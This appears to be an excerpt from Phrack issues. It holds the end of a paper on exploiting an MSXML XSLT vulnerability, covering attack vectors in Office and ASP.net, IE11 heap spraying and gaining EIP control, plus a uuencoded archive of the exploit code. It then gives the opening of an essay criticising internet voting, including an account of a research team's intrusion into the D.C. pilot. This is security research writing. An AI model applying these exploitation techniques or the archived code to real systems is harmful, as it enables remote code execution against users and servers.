overcomplicated fighting with complications.

Jumping back to our bug, it is important to highlight that, because the
target software is a global system framework rather than a direct attack
surface, IE might be the worst possible attack vector. Instead, one might
want to focus on covering a number of secondary vectors, that are less
constrained with mitigations (e.g. Microsoft Office for which an ASLR
bypass should no be an issue). As it ws shown in the Table in the section
2.2, it's possible to trigger the bug in Office 2007 via an embedded
JavaScript. Another possibility to mention, that MS Word has a poorly
documented functionality for using XML templates with XSL transformation
functionality, that might possibly be a vector
as well. And most importantly, many internet-facing web applications
based on ASP.net might be vulnerable with maybe a no-user-interaction
code execution on a Windows server.


--[ 6 - Conclusion

In this paper we have thoroughly analyzed and demonstrated a certain
control  over a curious specimen of a critical modern vulnerability in a
core Microsoft product, which somehow remained undercover for 2 years
despite of the publicly available trigger. We have also introduced a few
bits of previously  unpublished  information concerning MSXML internals,
JavaScript 9 internals, heap spraying  with images as well as general
heap spraying in  the latest Internet Explorer.

In order to analyze and control a modern binary vulnerability, a set of
distinct operations is applied, all of which we have revisited:

impact vectors research,
crash dump analysis,
exploitability estimation,
patch binary analysis,
and root cause analysis.

A seemingly uninteresting bug, previously discarded by automated tools
and superficial analysis, may turn out to be exploitable as a result of
an all-round investigation.

There may exist a multitude of ways to remotely reach a particular
vulnerability, apart from the most obvious (and likely the most
constrained) attack vector.

Deducing any specific vulnerability details from a vulnerability patch
only, such  as the triggering inputs or the root cause, may be extremely
hard or impossible  due to both the binary diffing complexities of large
amounts of binary code  modifications and the possibility of a seemingly
irrelevant code being changed.

A bit-accurate precision of the crafted input may be required to take a
vulnerability condition such as a read access violation to the control of
the program counter through the chain of code constraints along the
execution path, as well as an extensive grasp of the operating system
internals and a pages-accurate control of the target process memory space.

Bits of useful data may be leaked about the crashing context through
ordinary  memory access operations, even when no explicit information
leaking opportunity is provided by the vulnerability.

Internet Explorer 11 memory may be filled quickly with controlled data
that would be positioned predictably enough to control a highly entropic
vulnerability, despite the allocation randomization as well as the
possible anti heap-spraying mechanisms in place.

Microsoft XSLT technology is implemented as a simple virtual machine,
taking the input XSL code through the abstract syntax tree generation
with the ASTCodeGen class to 'XCode' compilation with the XCodeGen class,
to stateful frame-based computation with the XEngine class.

A huge memory spray may be contained in bitmaps, compressed into the PNG
format with zero loss.

A memory leaking opportunity will be required to take the vulnerability
from EIP control to shellcode execution.


--[ 7 - Thanks

Nicolas for publishing the repro trigger, my ex-boyfriend for the endless
supply of cat photos and Nutella, and my grandma for her loving support.


--[ 8 - References

  [1] Microsoft Security Bulletin MS13-002 - Critical - TechNet
      https://technet.microsoft.com/library/security/ms13-002
  [2] Nicolas Gregoire, "Mutation-based fuzzing of XSLT engines"
      http://www.agarri.fr/kom/archives/2013/02/25/
      mutation-based_fuzzing_of_xslt_engines/index.html
  [3] Greg MacManus, Michael Sutton, "Punk Ode: Hiding Shellcode in Plain
      Sight"
      https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Sutton.pdf
  [4] Ken Johnson, Matt Miller, "Exploit mitigation improvements in
      Windows 8"
      https://media.blackhat.com/bh-us-12/Briefings/M_Miller/
      BH_US_12_Miller_Exploit_Mitigation_Slides.pdf
  [5] Yuki Chen, "The Birth of a Complete IE11 Exploit Under the New
      Exploit Mitigations"
      https://www.syscan.org/index.php/download/
  [6] Zhang Yunhai, "Bypass Control Flow Guard comprehensively"
      https://www.blackhat.com/docs/us-15/materials/us-15-Zhang-Bypass-
      Control-Flow-Guard-Comprehensively-wp.pdf
  [7] Dion Blazakis, "Interpreter Exploitation. Pointer Inference and JIT
      Spraying"
      http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf
  [8] Fermin J. Serna, "The info leak era on software exploitation"
      https://media.blackhat.com/bh-us-12/Briefings/Serna/
      BH_US_12_Serna_Leak_Era_Slides.pdf
  [9] Yang Yu, "Write Once, Pwn Anywhere"
      https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-
      Pwn-Anywhere.pdf
  [10] Yuki Chen, "Exploit IE using scriptable ActiveX controls"
      http://www.slideshare.net/xiong120/exploit-ie-using-scriptable-
      active-x-controls-version-english


--[ 9 - Code

begin 644 code.tar.gz
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
0!@8&!@8U_@9W7BIU`%``````
`
end


--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x0b of 0x10

|=-----------------------------------------------------------------------=|
|=-------------=[ Internet Voting: A Requiem for the Dream ]=------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ kerrnel ]=----------------------------=|
|=------------------------=[ phrack@kerrnel.com ]=-----------------------=|
|=-----------------------------------------------------------------------=|

                        A! Fredome is a noble thing
                     Fredome mays man to haiff liking.
                     Fredome all solace to man giffis,
                     He levys at es that frely levys.
                      A noble hart may haiff nane es
                     Na ellys nocht that may him ples
                   Gyff fredome failyhe, for fre liking
                      Is yharnyt our all other thing.
                        Na he that ay has levyt fre
                     May nocht knaw weill the propyrte
                       The angyr na the wrechyt dome
                    That is couplyt to foule thyrldome,
                        Bot gyff he had assayit it.
                     - John Barbour, Brus Book I [26]


--[ Table of contents

   1 - A Backstory

   2 - Why Do People Want Internet Voting

   3 - The Evolution of Counting Votes

   4 - Where is Internet Voting Piloted and Used

   5 - Other Problems of Being On the Internet

   6 - End-to-End Verifiable Internet Voting Schemes

   7 - Push Back

   8 - But We Use The Internet for [Foo]

   9 - Imagining a More Secure Internet Voting System

  10 - Conclusion

  11 - Acknowledgements

  12 - References


--[ 1 - A Backstory

It's June of 2024 and a group of wealthy and powerful men are sitting in a
lounge room tucked away in the San Bernardino mountains, 80 miles east of
Los Angeles. Thick and acrid cigar smoke fills the room. But sickening to
me is the horrible stench of an entire nation's leadership being robbed.
The men chat and haggle over what candidate will be elected president,
senator, and so on.

The mess here in the U.S. was kickstarted 24 years ago in the 2000
election of Bush v. Gore. It took over a month to declare a winner
because of a dispute over vote counting in Florida. George Bush
eventually won Florida by 537 votes, or 0.009% [1]. There was a
tremendous amount of controversy over confusing ballots, errors with
punch cards, and recount anomalies.

In the aftermath, well meaning people called on computers to solve the
United State's voting issues. After all, computers have simplified all
other matters of life. But these people acted in a bit of arrogance; they
didn't understand the technology. They banked with the computer, chatted
with the computer, shopped with the computer, so surely it could be
trusted for voting as well. But they didn't understand the depths of
computer security problems, or why voting is fundamentally different than
all the other aforementioned tasks.  Security experts, almost universally
against electronic voting, were dismissed as paranoid.

In response to public demand, Congress passed the Help America Vote Act
that sought to replace punchcard and lever voting machines [38]. And thus
it is that our elections are now decided by the whim of powerful groups
controlling the elections servers. This paper will dissect the problems
that plagued internet voting from the very beginning.


--[ 2 - Why Do People Want Internet Voting

Before taking any serious examination of the flaws inherent in internet
voting, the question must be asked, why do people want internet
voting?  The answer is: 1) civic engagement, 2) money, 3) want of power,
and 4) technophilia.

Some activists believe internet voting will increase voter turnout and
thus cause higher civic engagement. That leads to the question, "Does
internet voting significantly increase turnout?" In 2002 some local
elections in the UK used an internet voting pilot, which lead to a 3.5%
increase in voter participation [6]. It is, however, impossible to prove
that this was because of internet voting [6]. Even if the increase in
voter participation was 50%, increasing voter participation at the
expense of having trustworthy elections is not a wise scheme. In the
United States anyone can vote by mail, by sending in a form and mailing
back a ballot that is sent to them. If participating in democracy is not
important enough for someone to mail a piece of paper, should we really
be bending over backwards to extend democracy to them?

Money is an inherent problem in online voting because there is a lot of
money to be made in voting systems. In the United States, open source
solutions are often not adopted by the government. If Internet voting was
ever seriously put in legislation here, companies would spew all sorts of
exaggerations about the security of their systems to receive lucrative
contracts to develop the system.  Also, in the case of electronic voting
machines, the companies long lobbied to keep their source code a
proprietary secret. That we entrusted the integrity of our democracy to
it was irrelevant to their patent attorneys [7].

There is also an argument that internet voting will save money on the
cost of running elections. While it might, it's not clear that the cost
of maintaining and developing the technology is actually cheaper than
using paper ballots. More importantly, the purpose of an election is not
to do it as cheaply as possible, but to have reliable results. It makes
no sense to undermine elections to save money.

Why those seeking power want in on internet voting is a longstanding
issue. Boss Tweed, the corrupt New York City politician estimated to have
stolen from $1 billion to $8 billion in 2010 dollars [8], said, "As long
as I get to count the votes, what are you going to do about it?" [35].
Controlling the elections officials counting the votes was (and still is)
one of the simplest ways to rig an election. This fraud is committed on
local scales, however, as in the United States it is thought to be
relatively impractical to rig a federal election county by county.

Of course, it could happen in the U.S., and certainly it has happened in
other countries. Consider, the 2011 election in Russia, which was
reported to have numerous and severe irregularities on a national level
[39].  In Ghana as well there were complaints of widespread fraud
designed to rig their 2012 election [40].

Even in countries where this is possible to achieve, it takes a lot of
coordination and work to pull off, requiring loyal political machines (or
serious threat of violence).  Internet voting, however, makes the fraud
much easier to commit as it is possible to attack single points of
failure -- a central counting server, or a piece of software running on
numerous precinct servers. Who wouldn't want to control the software
tallying the votes? At worst an entire country's results could be
manipulated, and even if each region or district had their own system,
groups could have a lot of influence controlling a regional election.

Finally, technophiles can be a driving factor behind internet voting.
These are people who just love having new technology for the sake of
having new technology. In fact, I myself am guilty of loving the latest
and greatest products. But in some cases, such as internet voting, we
ought to be careful to make sure that technology is really improving the
situation. So to the technophiles, even though I know they mean well, I
ask them to please be restrained and think about the consequences of
internet voting before we jump out of our seats for it.


--[ 3 - The Evolution of Counting Votes

Before the American Revolution, voting was generally conducted by voters
calling out their votes which a clerk recorded next to their name [2].
This made verification of vote counts very easy, but obviously introduced
a lot of opportunity for retaliation, vote buying, etc. By the time of the
American Revolution the Americans and French were exploring the use of the
secret ballot. The French constitution in 1795 mandated, "all elections
are carried on by secret ballot" [2].

Of course as voting by ballot began to catch on, so did ballot stuffing.
In 1856 a vigilance committee in San Francisco found a ballot box with a
false bottom trap that stored ballots. It would look empty upon
inspection before voting, and after the polls closed, the other ballots
could be secretly mixed in. Some of the first technology to combat these
tricks was quite simple: in 1858 Alan Cummings and Samuel Jollie both
patented transparent ballot boxes.  The design was quite simple: a glass
globe in a wooden frame so that the ballots were always plainly in view
from the start of voting to the moment of tabulation. This same principal
is still used in many countries, although plastics have generally
replaced glass [41].

Twenty years before the advent of the glass ballot boxes, the Peoples'
Charter of 1838 in Britain had already described a voting machine. I
strongly encourage the reader to have a look themselves at the image in
[42], but in it a brass ball was dropped into a hole, corresponding to a
candidate, which registered a vote on a dial.

In 1892 the Myers Automatic Voting Booth was first introduced in the
United States [43]. According to Douglas W. Jones of the University of
Iowa, in the 1890s these machines were on the cutting edge of technology,
with a tremendous number of moving parts. These machines did not provide
a voting record for each voter, but simply had a counter behind each
candidate which displayed their total number of votes.

Electoral fraud was of course already a big problem with these mechanisms,
and isn't a new concern with internet voting; my concern is just the
extent of it. In 1934 Joseph P. Harris published his report on voting
fraud in the United States [44]. He summarized types of fraud as such:

Registration frauds - Register dead, non-existent voters, etc. Votes are
then cast under the fake voters' names on election day.

Repeating - Persons go from precinct to precinct voting under the names of
these bogus voters, or even under the names of real voters.

Ballot box stuffing - Officers overseeing the election will stuff ballots
into the box. To avoid obvious counting issues, they will check off the
name of a no-show voter for each fraudulent ballot inserted.

Chain ballots - A marked official ballot is given to a voter in the
morning.  The voter is to deposit the market ballot and return the blank
ballot given to them at the polling station. They are paid once the blank
ballot is returned.  This process continues all day.  Harris notes a lack
of evidence that this was a common practice.

Assistance to voters - Voters may ask for assistance while casting their
ballot. This is an easy way to break voter secrecy and ensure people are
voting "the right way." They may ask for assistance willingly, or they may
be intimidated into doing so.

Intimidation and violence - Chicago, IL is a notoriously corrupt city.
Harris noted whole sections of the city being terrorized by "the gun play
of gangsters." Kidnapping had even been used to remove determined poll
watchers.

Altering ballots -  If a voter fails to vote for all candidates, an
election officer can simply add marks for their preferred candidate.
Likewise excess marks can be added to disqualify a ballot voting for
unfavored candidates.

Substitution of ballots - Legitimate ballots may be discarded, and other
ballots substituted for them.

False count and false returns - It's well understood that it's much easier
to simply rig the counting of votes than to alter ballots. In some cases
ballots are not counted at all, and results are simply fabricated. Votes
can also be read and/or recorded incorrectly by various precinct workers.

Altering returns - The precinct returns can be altered by officials in the
election office.

Specific to lever voting machines one reported form of fraud is to break
the teeth of the gear for a specific candidate's counting mechanism.  This
means that once during a cycle of the gear, a vote for that candidate is
not registered. In Philadelphia in 1978, there was an election to
determine if the mayor would be allowed to run for an additional term, as
he faced a term limit. During the elections, the machines failed,
curiously at high rates in districts that strongly opposed the mayor.
Unfortunately, a suitable report of why the machines failed was never
produced [2].

The next major technology change in voting came with the advent of the
punchcard. Punchcards themselves are just what they sound like -- cards
with perforated dimples that can be punched out to vote for a candidate.
However, as was seen in the 2000 United States presidential election, they
are susceptible to chads that are not not fully pushed out, creating
controversy over how to count those.  Around the same time, optical
scanning machines rose to popularity.  With these machines, which many of
us have used for exams in our school days, the voter bubbles in their
choice with a pencil or pen.

The next piece of voting technology, which moved closer yet to internet
voting, was the direct recording electronic voting machine, or DRE. These
are computers in which people place their votes, which are then
electronically tabulated. These machines are certainly more efficient
than paper ballot counting, but are riddled with grave security issues
[47]. I would love to explore those issues further, however, the focus of
this paper is on internet voting.


--[ 4 - Where is Internet Voting Piloted and Used

Now that we understand why people want internet voting, and the history of
voting technology leading to this point, for this paper it's important
that we understand where internet voting is being used already, and what
we know about these systems. I begin with an example of Washington D.C.
because it is a rare case where the public was allowed to fully
penetration test the system in a mock election.

In 2010 Washington D.C. embarked on a pilot project to allow voters to
participate in local elections through an online voting system.  In
September 2010, before collecting real votes, the Board of Elections
conducted a pilot test allowing any member of the general public to vote
and test the security of the system. Ultimately an attack by a team of
researchers from the University of Michigan caused them to cancel the
online voting initiative. The researchers were able to seize control of
the servers, unmask secret ballots, and alter the final election results.
The following information is a summary of what the Michigan team found (
please see [9] for a copy of their paper).

The system itself used a stack consisting of Ruby on Rails, Apache, and
MySQL. A front end web server receives HTTPS requests from the voters and
then reverse-proxies them to the application server which hosts the
software and stores the ballots. Multiple firewalls work to complicate
attacks by blocking outbound TCP connections. The University of Michigan
researchers noted that the intrusion detection system in front of the web
server failed to decrypt the HTTPS connections carrying their attack.

To login to the system the voter needs to use a voter ID number,
registered name, residence ZIP code, and 16-character hexadecimal PIN.
These credentials were sent out to voters in the mail.

The ballots themselves are PDF files, filled out by the user with a PDF
reader, and then uploaded to the server. To safeguard ballot secrecy, they
are encrypted with a public key issued by elections officials. When the
election ends they are transfered from the server to an offline machine,
holding the private key, where they are decrypted and counted. Think about
that -- they go through the trouble of keeping the ballot counting machine
offline but allow arbitrary PDF files to be opened on it. :>

Here are a few of the attacks that the Michigan team found. They stole the
public key, which despite the term public key should actually be kept
secret because it allows the application server to encrypt arbitrary
ballots to substitute real ballots. Once they stole the key, they indeed
used it to replace all of the previously cast ballots with forged ballots
that voted a ticket of their choosing. They then replaced the ballot
processing function with a modified function that would replace each
voted ballot with their forged ballot. This also broke the secret ballot
concept, as they used the new ballot processing function to track each
voter. And, an unencrypted copy of each ballot was stored in /tmp by the
PaperClip Rails plugin before encryption, so they could correlate the
file time to the logs and then match past ballots to voters. The database
credentials were located in the bash history file.

A 937 page PDF file containing all of the voters login credentials was
even located on the server, sitting in /tmp. And these were the
credentials for the REAL election, not merely the pilot test. Had the
real election not been canceled they could have used those to vote as
actual citizens.

Of course once finished they cleaned up the logs and removed all of their
files from the application server's directories.

To mark their territory after completely infiltrating the online voting
system, they programmed the confirmation page to play the University of
Michigan fight song when each user cast a ballot.

Despite their musical calling card, it took officials in D.C. 36 hours to
detect the attack and stop the pilot (another test user asked on a mailing
list what song is played for a successful vote, raising their suspicions).

There are many other examples of internet voting in use. These are given
as examples of countries using internet voting and not necessarily
examples of it being broken, but I do take the liberty of pointing out
concerns that I may have.

Canada. Although not used in federal elections, there are municipalities
in Canada that allow internet voting. A demo of the Intelivote System is
available at [45], however it had known hiccups in recent elections. In
2010 the system was being used across Ontario and it crashed late in the
election [46]. The president of Intelivote Systems Inc. claimed it was
because of unexpectedly high user demand, combined with a hardware
failure. The company claimed "the integrity of the vote activity was not
compromised and (Intelivote) is confident in the official election
results" [46].

Very troubling, however, is that the company, in the statement I found,
did not report having any outside parties evaluate the system to verify
the integrity.  Any company would certainly have financial incentive to
cover up a hacked election, although I have no evidence to suggest
InteliVote did any such thing. I simply raise the point.  A more
reasonable, and less accusatory scenario, is that they themselves may not
have realized if they were hacked, or not have gone to enough length to
find out. The fact that these incentives exist mean it is critical any
internet voting system is heavily audited by independent agencies.

New Jersey. On October 29th, 2012 Super-Storm Sandy battered the east
coast of the United States, with New Jersey being particularly hard hit.
The 2012 United States presidential election was held just a week later,
and many displaced residents needed a way to vote.  The governor ordered
displaced citizens be allowed to vote by e-mail or fax [17][18]. Not only
does this break ballot secrecy -- your email address being tied to your
ballot -- but your ballot can be compromised with hacking techniques from
the early days of Phrack, rather than advanced attacks.

Although I have yet to see a detailed analysis of the results of the
e-mail voting in New Jersey, I have found reports of at least a few
issues [36]. Voters voting by e-mail are required to mail in a paper copy
of their ballot, however several county clerks, and the executive
director of the New Jersey Democratic Party, did not know this. Most
likely thousands of voters did not know either. The requirement of
mailing a separate paper ballot always raises the question that I don't
understand: why bother? If they actually count all of the paper ballots
that each person had to mail, the e-mail voting was just a nice song and
dance and actually did not make anything more convenient or cheaper. If
they do not verify all the paper ballots, there was no point in sending
one, and then the results are not trustworthy. This leaves a choice
between convenient or trustworthy, and in an election we should always go
for the trustworthy option (paper ballots).

Arizona. The 2000 Arizona Democratic Party presidential primary was the
first major election held over the internet [19]. For the non-Americans
out there (most of the world), the political parties in America have many
candidates who want to run for president under the party's name, and thus
they hold a primary election to pick their candidate. The private company,
Election.com, hired to run the election reported that there was no
hacking. This was a groundbreaking precedent for a major public election
to include internet voting.

United States. The United States allows deployed service members of the
military to vote online.

Estonia. The first country to use internet voting on a national basis was
Estonia in 2005. Estonians have a national ID which contains an embedded
digital certificate, which combined with an individual's PIN, can be used
to uniquely identify that individual.  An individual needs a $7 smart card
reader, which will scan their digital certificate. The voting website can
then use this, combined with the PIN, to authenticate the individual
voting [20]. According to the PDF in [20] the ballots are secured and
kept secret through this process:

             "A double-envelope scheme used for postal voting
              in some countries guarantees the secrecy of the
               vote. The voter's choice is encrypted by the
              voting application (i.e. voter seals the choice
              into an inner blank envelope) and then signs it
               digitally (i.e. puts the inner envelope into
               the outer one and writes his or her name and
              address on it). The signed and encrypted votes
              (outer envelopes) are collected to the central
               site for checking and ensuring that only one
                vote per voter is counted. Before counting,
               digital signatures with personal data (outer
              envelopes) are removed and anonymous encrypted
               votes (inner envelopes) are entered into the
              ballot box for counting. The scheme uses public
                             key cryptography"

So what do I think of this implementation of internet voting? A few
thoughts. First off, Estonia is rare in that all of its citizens have a
national ID card equipped with a smart chip inside. Even then a team of
observers from OSCE/ODIHR (Organization for Security and Cooperation in
Europe/Office for Democratic Institutions and Human Rights) found major
security issues with the 2007 election [2].

Among the issues, the project manager was able to push changes to the
voting software at will, meaning a version modified by insiders could
easily be put onto the server. Furthermore, a code review report was never
produced, and there is no policy in place dictating when internet votes
would be invalidated. I cannot stress this point enough, as it applies to
all countries: most internet voting advocates say, "Don't worry, if there
was fraud we could always invalidate the internet votes." But nobody smart
enough to hack a country's election will commit fraud in such an obvious
way that people will know to invalidate the votes. Rather they would
generate results that were statistically likely to happen and then hide
all traces of their activities.

Austria. In 2009, Austria used internet voting for the Federation of
Students' student union election according to the U.S. Election Assistance
Commission (EAC) [48]. Although Austria does not allow for the use of
internet voting in parliamentary elections, student union elections in
Austra are regulated by law, and were allowed to use internet voting.
Scytl, a European company, was selected as the software provider for the
election. For the election Austria used a national ID card, which had two
distinct PIN numbers that a voter had to use during the voting process.
They also needed a card reader for the national ID card.

Finland. Per the same EAC report, Finland allowed internet voting for
municipal elections in 2008 [48]. In Finland, kiosks at polling places
were used to access the internet voting application, rather than allowing
users to vote at home. Votes were encrypted and digitally signed by the
kiosk before transmission to the server. This election wound up having a
bug causing certain votes not to be counted, and thus had to be redone
anywhere where internet voting was used. As a result, they scrubbed the
pilot. As a note, the Finnish chose to use kiosks at the polling place
because they felt voting at home risked ballot secrecy and allowed the
bribery and intimidation of voters.

France. The EAC discussed internet voting being used in France dating back
to 2001 [49]. In 2001, Voisins-le-Bretonneux conducted an internet
voting pilot that used kiosks at the polling place like the Finnish did.
This was for municipal elections only. In 2009 the French Ministry of
Foreign Affairs setup internet voting for French citizens living overseas.
It was designed to make it easier for overseas voters to vote, and 310,000
French citizens used it. Scytl provided the technology along with Atos
Origin. The report says Opida, a security consulting company, audited the
election. Strangely I cannot find the existence of a company called Opida,
however there is a security consulting firm called Oppida located in
France so I assume this is the company in question [49].

Switzerland. In Switzerland, three of the 26 Swiss cantons have internet
voting as an option: Geneva, Neuchatel, and Zurich [49].  Since the three
all use different systems, I want to focus on Geneva's system. Geneva's
government owns and runs the system itself. Voters received a Voter
Card in the mail, which had the information needed to vote by internet,
mail, or in person. The voter used the information from this card to login
to the online voting system. They then selected choices on a ballot, and
saw a confirmation screen displaying all of their choices before casting
the ballot. Lastly, the voter needed to use a pin code located on the
Voter Card to cast the ballot.

Interestingly the Geneva state council enforced the following 11
requirements for the election (taken verbatim from [49]):

    1) Votes cannot be intercepted nor modified
    2) Votes cannot be known before the ballot reading
    3) Only registered voters will be able to vote
    4) Each voter will have one and only one vote
    5) Vote secrecy is guaranteed
    6) The voting application will resist any DoS attack
    7) Voters will be protected against identity theft
    8) Number of cast votes = number of received ballots
    9) It will be possible to prove that citizen X voted
    10) The system will not accept votes outside the ballot opening
        period
    11) The system will be auditable

I find these requirements curious, as in theory it's not possible to meet
them in a computerized system. The issue is the use of terminology such
as "cannot" and "prove." For example, I assume where it says "votes
cannot be intercepted nor modified," SSL is used to encrypt the web
traffic. But of course SSL can be attacked, and thus votes can be
intercepted or modified.

The Swiss do use one really cool piece of technology in their voting
technology: quantum encryption [24][54]. The details of quantum encryption
are outside the scope of this article, but it uses photons of light to
send encrypted messages. It is based on the fact that the quantum state
of a particle cannot be observed without altering it permanently, so
eavesdroppers cannot read the photons without destroying the information
encoded in them. The Swiss use the quantum encryption technology to
transfer vote counts over fiber optic cable from a vote counting station
in the city, to a government data center in the suburbs of Geneva.

United Kingdom. According to the EAC report [48], the UK has conducted
over thirty internet voting pilots for local elections between 2002 and
2007. In a 2002 pilot, nine locations enabled internet voting pilots. The
Liverpool pilot was particularly interesting in that voters could vote
via SMS, as well as from their home computers.  Liverpool's was run by
Election.com, the same company that ran Arizona's Democratic Primary in
2000.

In Liverpool, electors were mailed an information sheet with PINs,
passwords, candidate codes, the web address and instructions. Voters using
the internet voting went to the web-site and entered the PIN and password
specified in their information sheet. The voters then made their
selections and voted after confirming their choices. The vote was then
transmitted over the internet to Election.com's servers, where it was
tallied.

Voters using SMS to vote sent a text message that was formatted as such:
    <PIN>
    <PASSWORD>
    <CANDIDATE NUMBER>

They then sent the message to a phone number specified in their
information sheet. Apparently each ward used a different phone number.
The voter then receives a confirmation text message, and the vote was
then sent to the same Election.com server as the internet votes. I have a
lot of concerns about voting via SMS. I am not very knowledgeable with
SMS protocols, but the information I have read indicates SMS messages are
encrypted with the broken A5 cypher and only between the phone and the
cell tower [50].  Furthermore, I know from firsthand experience how many
times I've tried to send a text and it doesn't show up until hours or
days later. Not a system I want casting my vote.

In Liverpool, for the 2002 pilot, the EAC reported that 59.4% of voters
voted in person, or by mail, 16.4% voted by internet, 17.4% by telephone,
and 6.7% by text message.

State of New South Wales. Can't forget the Aussies out there! The last
example I will pull from the EAC report [48] is the State of New South
Wales which allowed voting from home by internet and telephone in their
2011 state election. They called the system iVote. It was designed for
voters with disabilities (including legal blindness), illiterate voters,
and voters traveling or living 20km or more from their polling place.
Everyone Counts [51] was responsible for the core technology behind the
voting system. Voters registered to use the iVote system over the internet
or by calling an iVote operator.  When they registered, voters specified a
six digit PIN.  The voter then received an eight digit iVote number (which
was sent by email, mail, telephone, or text). In that trial, 2,259 voters
voted by phone and 44,605 voters voted by internet.

The government of New South Wales produced a post election report on the
election [52]. They commissioned Pricewaterhouse Coopers (PwC), one of the
"big four" accounting firms, to generate the report. The report at [52]
claims they found that no tampering had occurred with the ballots. However
they say only that this information was gleaned from "cryptographic
integrity checks," which is not specific enough for me to draw any
conclusions. Consider the Helios example, presented later in the paper, as
proof that ensuring that nothing was tampered with on the server side as
little evidence that the election was not rigged.

In the report they note that they tested the iVote system and made sure
the test results recorded matched the test votes cast for internet and
phone voting. However, a team of researchers at Princeton University wrote
malware for a Diebold Accuvote-TS machine which disabled itself during
test mode, and then completely wiped itself after the election leaving no
traces [53]. The same type of attack could work against an online voting
system such as iVote, although of course there is no evidence is has been
done... yet.

The PwC report also contains a list of incidents in Appenix C [52].  The
problems ranged from relatively harmless (voters were sent the wrong iVote
numbers and then given the correct iVote numbers and asked to vote again)
to grave.  On March 23, 2011 there was an 8 minute outage of the iVote
system between 10:24 AM and 10:33 AM for which no cause was ever
identified. Not every outage in a system is a sign of foul play but in a
system which runs a state's election, I would like better answers than
"undetermined cause."


--[ 5 - Other Problems of Being On the Internet

Cyber warfare has become big business. For example, on March 20, 2013,
South Korean TV networks and banks were crippled in a cyber attack that
was ultimately blamed on North Korea [11]. The U.S.  government seems
paranoid about cyberattacks originating in Iran and China [29]. While it
is difficult to know how much truth there is to individual claims about
who is attacking whom, I think we can all agree that there are certainly
